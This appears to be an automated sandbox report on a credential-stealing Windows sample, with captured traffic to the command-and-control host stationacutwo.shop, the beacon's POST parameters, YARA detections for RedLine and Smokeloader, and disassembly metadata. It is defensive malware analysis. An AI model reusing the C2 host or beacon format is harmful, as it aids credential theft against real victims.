2024-07-02 19:24:32 UTC	15331	OUT	Data Raw: 6b 10 70 b6 f1 88 09 53 41 10 a8 35 c0 7b 70 29 bc c0 57 12 ed f5 5c bc 7d 0a 03 f6 63 1c 31 c0 e1 30 7c 1a 58 0f 0d c2 6f 51 79 e2 b8 07 1f e9 1d 43 6e 4e 61 af da f1 7f fa ca 6d db 7c 72 e3 d3 69 13 3c e2 f4 57 2a 3f 34 72 8c 82 e4 78 ee c3 a9 30 55 76 91 25 5a 7e a1 b6 33 ef 5c 52 d6 03 a8 24 b9 3a 43 8a fe b2 2d ea 6f 24 c5 94 12 15 7b 5e 92 ea 0c 10 04 5b bd 9b 57 22 e1 76 98 79 18 41 f1 03 ea 80 37 b1 50 21 27 7d a7 7e 46 29 bf dc 26 a2 8f ee 98 e1 55 60 60 58 5e 98 60 12 8f 4e fe 22 fc 61 29 8e fb 40 1b ed d0 95 ae 8f aa 2f de 3f 58 e8 df 84 34 91 45 26 88 0c c9 83 dc 1f 89 77 a9 1f 60 65 7e 10 63 c8 aa 0f 02 91 a2 3f 0e f7 25 13 ad 47 6a f0 40 5b d4 73 a4 06 05 f7 18 28 b9 87 c3 84 27 61 7a fc 49 0b 83 f9 b6 a3 99 19 04 91 96 5a 85 0c c5 67 94 44 Data Ascii: kpSA5{p)W\}c10\|XoQyCnNam\|ri<W*?4rx0Uv%Z~3\R$:C-o${^[W"vyA7P!'}~F)&U``X^`N"a)@/?X4E&w`e~c?%Gj@[s('azIZgD
2024-07-02 19:24:32 UTC	15331	OUT	Data Raw: 8f 26 8d 2f f4 be 05 62 08 7b 68 fd bc 30 bf 49 51 40 2e f7 d1 c4 a8 ca db ef 32 f4 da a1 5d ab d3 da ab 39 2a d6 3c 68 de 46 18 bf 67 5a f7 e2 94 b0 4a aa a0 2d 80 15 73 8f 1b b1 ef be 88 76 89 0a 46 85 e3 81 9a 69 fd 5d a4 92 fa 87 e0 19 43 4a 81 d8 ba 88 40 83 36 d7 c8 f6 f7 79 d7 ea 9b af 66 6a 08 05 27 11 a6 65 36 18 1e a0 57 75 1e 89 0d ed d4 ce 29 e6 04 9e 69 54 ba 63 56 86 69 6a 6c d2 84 88 fd b0 06 0e 12 38 b4 3d 19 58 2b 3b ab 3f ce 4b 30 0a 37 8a 5f b8 aa f1 70 ee f9 48 62 46 d2 9c 26 32 36 2b 00 94 de 41 07 94 d3 df 7c 19 fd d1 0f 58 81 c8 0f ff 8d 94 d4 2a d4 45 1b 0c 5c 72 f8 ca d9 c2 81 ee cc 75 de ca 09 74 2f cf 30 b3 ac e3 a0 5d 25 e5 19 93 8e cd 02 7d a7 ac 41 04 3f 8f 0c ba 54 69 37 0b cb db 6e 16 c8 39 2e a6 3d b9 f1 65 c3 6b a2 37 df Data Ascii: &/b{h0IQ@.2]9<hFgZJ-svFi]CJ@6yfj'e6Wu)iTcVijl8=X+;?K07_pHbF&26+A\|XE\rut/0]%}A?Ti7n9.=ek7
2024-07-02 19:24:32 UTC	15331	OUT	Data Raw: 28 43 3e 44 96 e8 8d 44 45 5f 5a 3d 69 af f7 87 2e 52 6b 1c 30 71 14 15 24 b8 01 b0 12 73 b3 56 76 a4 ce 9f fb e3 3d df 9e 21 8f 09 11 0e e8 66 22 28 ce 47 8c 83 43 3e 7a 3f 8e ba df 70 fd 38 68 2f 96 f4 ba fe 9f 5e bf d6 26 28 b3 7c 9d 84 a0 b8 0e a6 93 88 d3 66 b7 44 72 fc 12 63 95 f7 4a 7e 91 7e 87 a0 c8 9a 62 d8 85 c7 c0 2b 1b 53 74 94 20 52 c7 d5 19 c3 ab 0d 45 71 2f 18 a5 92 88 79 d5 27 cc 9a 4a 11 8c 16 6f 4e b1 9f ee 46 fe 34 b3 ba 42 2f 84 77 86 c7 0e fe 5b a8 b8 56 a1 fb 38 74 fc c8 63 a7 55 9f d1 8c de 1f 65 a3 3c 65 8a 49 e9 06 62 21 9b 26 1c 44 9a 7e bb a6 1e f4 e5 31 cf a8 7c c6 70 3b c8 e2 55 af 76 32 59 01 d9 a1 41 75 be 25 3e 75 57 4b ce 2d 5a d7 dc 2a 0e 99 3f 57 e2 d1 92 9c f5 f5 91 6e 99 6e 7f 70 ef 5b a7 8d 52 27 5e b3 77 ef ef 51 de Data Ascii: (C>DDE_Z=i.Rk0q$sVv=!f"(GC>z?p8h/^&(\|fDrcJ~~b+St REq/y'JoNF4B/w[V8tcUe<eIb!&D~1\|p;Uv2YAu%>uWK-Z*?Wnnp[R'^wQ
2024-07-02 19:24:34 UTC	802	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 19:24:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1g9ti55ihpfdh9de1s2hb404lh; expires=Sat, 26-Oct-2024 13:11:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZskTDDrBShKTtCi%2FeqwTeMWTio9givzqxdZgJmQQMe6fW1oYBT%2F9MT8JahAaxuPzLNgcgpWfo95xgOw%2BtZLxyYSEoNbgWJUQUyBkYpFa5pndRMb29THLs4YHEttiqRLzfQ2VENA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d104417e1f41ad-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49743	188.114.96.3	443	7344	C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 19:24:34 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: stationacutwo.shop
2024-07-02 19:24:34 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 6b 65 79 26 6a 3d 26 68 77 69 64 3d 37 37 42 37 33 42 34 42 33 32 34 31 34 44 34 41 43 33 38 44 43 46 30 35 36 36 43 33 30 45 36 43 Data Ascii: act=get_message&ver=4.0&lid=P6Mk0M--key&j=&hwid=77B73B4B32414D4AC38DCF0566C30E6C
2024-07-02 19:24:35 UTC	804	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 19:24:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d7h70a4d0ifs3195j9ok5moii3; expires=Sat, 26-Oct-2024 13:11:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9nkPlO%2FofbZzBF9SBnFyp8XIatLbwXoEo2dNMdvezD1imbMUO89zP%2FBmrvWP58FWd%2Bi0Qzi0Jdj%2FHJLmLJFX0Or7W6Sw9Zfwi6atCwyxiJ5K9Et6JjSiQte1Z1kRpp29qbFEcE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d1044dd95bc41b-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 19:24:35 UTC	54	IN	Data Raw: 33 30 0d 0a 75 48 36 69 6d 43 76 33 51 44 47 33 4a 73 49 65 6c 45 4a 71 61 4a 61 6d 6f 44 32 64 65 32 4f 54 68 51 6f 75 50 55 6c 37 6f 4f 50 6a 49 77 3d 3d 0d 0a Data Ascii: 30uH6imCv3QDG3JsIelEJqaJamoD2de2OThQouPUl7oOPjIw==
2024-07-02 19:24:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:24:13
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe"
Imagebase:	0x400000
File size:	297'984 bytes
MD5 hash:	1EE22348C50E6AA7C055AE0E006A96AB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1949210599.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1961272232.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2156496909.0000000002AC1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1974922177.0000000002B39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1974177524.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1949376652.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1973966010.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1961407186.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:24:34
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7344 -s 1640
Imagebase:	0xa70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	9%
Signature Coverage:	34.8%
Total number of Nodes:	310
Total number of Limit Nodes:	21

Executed Functions

Function 0040A660 Relevance: 23.0, Strings: 18, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R5OK, xrefs: 0040AB7B
hvkg, xrefs: 0040A798
", xrefs: 0040A921
,Y._, xrefs: 0040ABB2
VU, xrefs: 0040ABD3
9E?[, xrefs: 0040ABA7
de, xrefs: 0040AC7F
)N/, xrefs: 0040AB37
A%R;, xrefs: 0040AB4F
X=G3, xrefs: 0040AB65
>M(C, xrefs: 0040AB91
3A%G, xrefs: 0040AB9C
AQNW, xrefs: 0040ABC8
YC, xrefs: 0040A874
z1{7, xrefs: 0040AB70
0, xrefs: 0040A6D6
%]kS, xrefs: 0040ABBD
P!D', xrefs: 0040AB47

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: )N/$"$%]kS$,Y._$0$3A%G$9E?[$>M(C$A%R;$AQNW$P!D'$R5OK$VU$X=G3$YC$de$hvkg$z1{7
API String ID: 0-4040250002
Opcode ID: 906a309b4c213f3f71662dafc193f0048c77dc18250d417c65fbda64100fdd68
Instruction ID: c80a80122ea38f6177d6778402e845d1a0914cd77fa5e5881f2d0bf96c569a28
Opcode Fuzzy Hash: 906a309b4c213f3f71662dafc193f0048c77dc18250d417c65fbda64100fdd68
Instruction Fuzzy Hash: 920235B1618381ABD314CF24C590B5BBBE2ABC5708F589D2EE4C98B392D778D805CB57

Function 0042EA70 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 0042EB0C
GetSystemMetrics.USER32 ref: 0042EB1D
DeleteObject.GDI32 ref: 0042EB85
SelectObject.GDI32 ref: 0042EBDF
SelectObject.GDI32 ref: 0042EC6D
DeleteObject.GDI32 ref: 0042ECAA

Strings

, xrefs: 0042EC3A

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 1449868515-3916222277
Opcode ID: bcf94c8979bb7764ca8433f98d3f91d2a126e05a4c66d84b124e04768f202066
Instruction ID: d51dbaa2c5b2c570c410d49e690ffe92d78ef2a0a1b3f72f1bead9a24340eeae
Opcode Fuzzy Hash: bcf94c8979bb7764ca8433f98d3f91d2a126e05a4c66d84b124e04768f202066
Instruction Fuzzy Hash: FC914AB4A15B008FD364EF29D985A16BBF0FB49700B104A6DE99AC7760D731F848CF96

Function 00420CED Relevance: 11.8, Strings: 9, Instructions: 516
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

F-[/, xrefs: 00420D49
T!o#, xrefs: 00420D42
O=M?, xrefs: 00420D2D
E)E+, xrefs: 00420D50
p9D;, xrefs: 00420D34
:Y![, xrefs: 00420D6C
789:, xrefs: 00421150
C%g', xrefs: 00420D3B
A5B7, xrefs: 00420D1F

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 789:$:Y![$A5B7$C%g'$E)E+$F-[/$O=M?$T!o#$p9D;
API String ID: 0-3397566058
Opcode ID: 8d1aeabb44051710710944ecee0110b5e4c14e8fbd5399a38bc86ce08f85dd55
Instruction ID: e2f5b5d13d7ef941d0bd8941e32a25c7e1ea7d40d2811709b79d41f6151a8d56
Opcode Fuzzy Hash: 8d1aeabb44051710710944ecee0110b5e4c14e8fbd5399a38bc86ce08f85dd55
Instruction Fuzzy Hash: 6F12AEB5200A41DFD724CF29D880B16B7F2FF5A300F55896DE5868BB61D735E862CB88

Function 00418192 Relevance: 10.8, Strings: 8, Instructions: 776
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JM, xrefs: 004189D2
WUVN, xrefs: 00418688
65, xrefs: 004183F4
_\[D, xrefs: 004186A0
vgah, xrefs: 004186E0
wtk~, xrefs: 004186C8
IO, xrefs: 00418241
OQCC, xrefs: 00418690

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 65$JM$OQCC$WUVN$_\[D$vgah$wtk~$IO
API String ID: 0-3661617438
Opcode ID: a2dc5f16524c64fad04915c32e9b3ddd7591e423e7864197906a12ac63feabf6
Instruction ID: a2e02e5434c27961e1388cfbbe2da7f2cba5738d83c89f8da755f113e25d77e2
Opcode Fuzzy Hash: a2dc5f16524c64fad04915c32e9b3ddd7591e423e7864197906a12ac63feabf6
Instruction Fuzzy Hash: 8A4267B16083408BC714CF14C8917ABBBE1EFD6358F14891DE8D99B391DB78D985CB8A

Function 00410950 Relevance: 10.4, Strings: 8, Instructions: 384
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MJK, xrefs: 00410A62
(P, xrefs: 00410C48
O], xrefs: 00410C56
BG, xrefs: 00410C5D
IV, xrefs: 00410C4F
stationacutwo.shop, xrefs: 00410D64
YC, xrefs: 00410A42
]_, xrefs: 00410BCA

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (P$BG$IV$MJK$O]$YC$stationacutwo.shop$]_
API String ID: 0-3710986456
Opcode ID: 432b1084d3cb6012353411014e7ca03366d81e9c1885a1027ebfdc2d1456500b
Instruction ID: ea2c913badcb648db7674b3253bb285aba1c5eb39d8bb8dbe8534b586dedb8e0
Opcode Fuzzy Hash: 432b1084d3cb6012353411014e7ca03366d81e9c1885a1027ebfdc2d1456500b
Instruction Fuzzy Hash: 50D1BC741047818FD729CF29C4A0762BBF2FF5A304F28859DD4D68B756C379A886CB98

Function 00418C50 Relevance: 9.2, Strings: 7, Instructions: 425
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]&[, xrefs: 00418C82
Lm5k, xrefs: 00418CA2
QS, xrefs: 00418E66
xy, xrefs: 00418CCE
;I9W, xrefs: 00418C6A
!, xrefs: 00418E8A
Bmrs, xrefs: 00419098

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: !$$]&[$;I9W$Bmrs$Lm5k$xy$QS
API String ID: 0-3575319576
Opcode ID: 5a3f5b41950fbf565097ba579bce87e5789009108fe284044e148c97a856293d
Instruction ID: bb8b783e275e5c4daa1cbe93d183a171b09ff602ef2634ad125037ed41c9781c
Opcode Fuzzy Hash: 5a3f5b41950fbf565097ba579bce87e5789009108fe284044e148c97a856293d
Instruction Fuzzy Hash: 0AC1AA715083018BC718CF04C8A17ABB7F1FF86354F098A1DE8D65B391E7B8A945CB9A

Function 0041003F Relevance: 9.1, Strings: 7, Instructions: 394
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

i~}n, xrefs: 004101D6
qg+#, xrefs: 004101E4
2]'_, xrefs: 0041040E
stationacutwo.shop, xrefs: 00410491
wt4e, xrefs: 004101DD
6)<w, xrefs: 004101EB
YC, xrefs: 004101B3

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 2]'_$6)<w$YC$i~}n$qg+#$stationacutwo.shop$wt4e
API String ID: 0-3386725333
Opcode ID: e286607c4219c1cc5ba2255275243be28e9af2c0bb14e65c6f694e93c298af20
Instruction ID: 36ac29d30fc3d7e422e7b7a47710b93391c6666a035071c529703b0e0c95256f
Opcode Fuzzy Hash: e286607c4219c1cc5ba2255275243be28e9af2c0bb14e65c6f694e93c298af20
Instruction Fuzzy Hash: 49D18AB05007418FD724CF29C595762BBF1FF56300F248A9DE9E68B796E334A885CB89

Function 00416C48 Relevance: 8.0, Strings: 6, Instructions: 457
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%U&W, xrefs: 00416CB7
ac, xrefs: 00416CDA
RnA, xrefs: 00416E3A
mo, xrefs: 00416CC5
8Q/S, xrefs: 00416CBE
0]-_, xrefs: 00416CA9

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: mo$%U&W$0]-_$8Q/S$RnA$ac
API String ID: 0-4156691688
Opcode ID: 477f3a90406ee796106e8199faeb1f5f6401d6edab8d17308587e79de5b1ed3a
Instruction ID: 8c71e43de4e9ad3ffef3ee1d2c3325ec954b84490856b0ab1d02feb3fcc9aec5
Opcode Fuzzy Hash: 477f3a90406ee796106e8199faeb1f5f6401d6edab8d17308587e79de5b1ed3a
Instruction Fuzzy Hash: B2E1BFB5600701CFDB28CF29D891A23B3B1FF8A314F15496DE8868B796D779E841CB94

Function 00427141 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 470COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 004272B9
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 004273DB

Strings

2PBb, xrefs: 004277CF
cfbe, xrefs: 004273E8

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ComputerName
String ID: 2PBb$cfbe
API String ID: 3545744682-517685108
Opcode ID: 2cccfbb5d267f8f8491c01e49efb610de094c8bfb3e74e625019bdc8333cdebc
Instruction ID: 1610c54c3f6f0f38670fb0a8e6c5d4b54b07aa94dac22c9e7c7613111b9be88c
Opcode Fuzzy Hash: 2cccfbb5d267f8f8491c01e49efb610de094c8bfb3e74e625019bdc8333cdebc
Instruction Fuzzy Hash: 74F1AC70608B408FD729CF38D4947A3BBE1AF56305F484A5EC0EB8B392D779A545CB94

Function 0041718B Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 447COMMON

Download Yara Rule

Strings

V\V[, xrefs: 004171D4
EEM@, xrefs: 004171E9
^T^S, xrefs: 004171E2

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: EEM@$V\V[$^T^S
API String ID: 0-230699993
Opcode ID: 54ad9e4f0da778e4146d3b11c23c6e663aad0925dcab7099f361fdf5de9df704
Instruction ID: eb79208d4950bb4854f23a5550480fb08d5f962a35a96431f028d450b0c8bc53
Opcode Fuzzy Hash: 54ad9e4f0da778e4146d3b11c23c6e663aad0925dcab7099f361fdf5de9df704
Instruction Fuzzy Hash: 3DF1DEB56047018FC728CF28C891A67B7F2FF4A304B14496DE9968BB92E738F851CB54

Function 00422290 Relevance: 5.5, Strings: 4, Instructions: 494COMMON

Download Yara Rule

Strings

789:, xrefs: 00422939, 004228EE, 00422A3D, 004229EE, 004227F0, 004227F4
!\, xrefs: 00422444
-', xrefs: 00422434
#", xrefs: 0042243C

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: !\$#"$-'$789:
API String ID: 0-2824663564
Opcode ID: e3cd5525f868cf4d381e6b1808068411758c18a1d45f7f6342ad74b0c6604501
Instruction ID: b827f668b81c3dec2976a3d6333a79c599a5891d8a0a68d9fa0b390b96e918fc
Opcode Fuzzy Hash: e3cd5525f868cf4d381e6b1808068411758c18a1d45f7f6342ad74b0c6604501
Instruction Fuzzy Hash: 131285B96083819FD324CF14E95076BBBF1FFC6344F44892DE6858B291D7B99801CB96

Function 0041773E Relevance: 5.5, Strings: 4, Instructions: 478COMMON

Download Yara Rule

Strings

mic), xrefs: 00417750
%$', xrefs: 004178FF
agld, xrefs: 00417757
%$', xrefs: 0041782D

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: agld$mic)$%$'$%$'
API String ID: 0-1514905728
Opcode ID: 9a1b647f2aec4cb722ff6a04bb8b182dafd964c12dd8802b86cf620a722cd7f9
Instruction ID: 0b2cf607e9b3e62af25037e3bcf43a7f484840dd48ff8c122ead288a72a71f74
Opcode Fuzzy Hash: 9a1b647f2aec4cb722ff6a04bb8b182dafd964c12dd8802b86cf620a722cd7f9
Instruction Fuzzy Hash: 54F1AAB5604A00CFD724CF29C881B62B7F2FF5A304B14896DE58ACB761E739E851CB94

Function 00421570 Relevance: 4.1, Strings: 3, Instructions: 362COMMON

Download Yara Rule

Strings

/, xrefs: 00421944
789:, xrefs: 00421686
%, xrefs: 0042194C

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: InitializeThunk
String ID: 789:$%$/
API String ID: 2994545307-3498975593
Opcode ID: 042d2fd3a746b6e0259f4ec6b2aa515fe61054a76cf7e2b4788c9f65c6b574ea
Instruction ID: 2012c8fc319fd6df49528bb51d26bdfeaeef97fa57471ae4c356f3d16b37e7cf
Opcode Fuzzy Hash: 042d2fd3a746b6e0259f4ec6b2aa515fe61054a76cf7e2b4788c9f65c6b574ea
Instruction Fuzzy Hash: E6C101B1A083218BD714DF18D88172BB7E1EFA5344F58492EE4C187361E738DC45CB9A

Function 00417D08 Relevance: 4.1, Strings: 3, Instructions: 310COMMON

Download Yara Rule

Strings

guc{, xrefs: 00417FE4
crvi, xrefs: 0041804E
3, xrefs: 00417EF3

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: crvi$guc{$3
API String ID: 0-3059600650
Opcode ID: 12a1bd76c8d005eb056525eaa6a8152fdb67dfc0a2fd0441d1816a646aa73ac3
Instruction ID: fbf61555d20871bbe670de29a5e21fd6d5673566e70cb8c1ea83b349504c6d69
Opcode Fuzzy Hash: 12a1bd76c8d005eb056525eaa6a8152fdb67dfc0a2fd0441d1816a646aa73ac3
Instruction Fuzzy Hash: 83C1C47160C3808FD725CF28C4917ABBBE2AF96354F14886EE4C987381DB399985CB57

Function 02AC23F6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02AC241E
Module32First.KERNEL32(00000000,00000224), ref: 02AC243E

Memory Dump Source

Source File: 00000000.00000002.2156496909.0000000002AC1000.00000040.00000020.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac1000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: a38cbbf48c846c165a25506e92512bd3ad22e213664fd4218c5ccd1288c55e6b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 08F06D32200711ABE7303BB9A98CB6A76E8BF49625F20052DEA86910C0DF70E8458A65

Function 00405460 Relevance: 3.0, Strings: 2, Instructions: 451COMMON

Download Yara Rule

Strings

), xrefs: 00405511
IEND, xrefs: 00405932

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

